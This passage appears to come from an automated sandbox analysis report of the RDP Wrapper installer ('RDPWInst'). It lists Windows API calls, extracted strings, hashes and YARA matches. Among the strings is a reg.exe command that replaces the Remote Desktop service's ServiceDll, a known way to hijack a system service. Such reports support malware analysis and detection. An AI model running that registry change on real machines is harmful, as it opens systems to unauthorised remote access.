                                                                                • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                Strings
                                                                                • $sD, xrefs: 0043C60D
                                                                                • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                • %SystemRoot%, xrefs: 0043C682
                                                                                • ServiceDll, xrefs: 0043C650
                                                                                • [-] OpenKey error (code , xrefs: 0043C612
                                                                                • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                • " /f, xrefs: 0043C69A
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                • API String ID: 1452528299-2956723230
                                                                                • Opcode ID: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                • Instruction ID: 86ae2d0f633f2b7d457566c29c3046f730a81976c8e7ce91198a0ccb689aa4bb
                                                                                • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                                                • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                                                • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                                                • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                                                APIs
                                                                                • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                Similarity
                                                                                • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                • String ID:
                                                                                • API String ID: 3749826553-0
                                                                                • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                                                • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                                                • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID: $zD$xPD
                                                                                • API String ID: 1263568516-535612291
                                                                                • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                                                • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                                                • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                  • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                  • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                • String ID:
                                                                                • API String ID: 3490077880-0
                                                                                • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: $zD$$zD
                                                                                • API String ID: 4275171209-354537599
                                                                                • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                APIs
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 986138563-0
                                                                                • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: ImagePath
                                                                                • API String ID: 3660427363-1008103227
                                                                                • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID: $sD
                                                                                • API String ID: 71445658-3047594130
                                                                                • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                APIs
                                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: ServiceDll
                                                                                • API String ID: 3702945584-3252591312
                                                                                • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                APIs
                                                                                  • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: $sD
                                                                                • API String ID: 47109696-3047594130
                                                                                • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: ImagePath
                                                                                • API String ID: 3660427363-1008103227
                                                                                • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateOpen
                                                                                • String ID:
                                                                                • API String ID: 436179556-0
                                                                                • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                  • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                  • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2912033995-0
                                                                                • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                APIs
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1799206407-0
                                                                                • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                                                • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCompareExchangeHandleInterlocked
                                                                                • String ID:
                                                                                • API String ID: 190309047-0
                                                                                • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                                                • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                                                APIs
                                                                                • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFlush
                                                                                • String ID:
                                                                                • API String ID: 320916635-0
                                                                                • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                                                • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
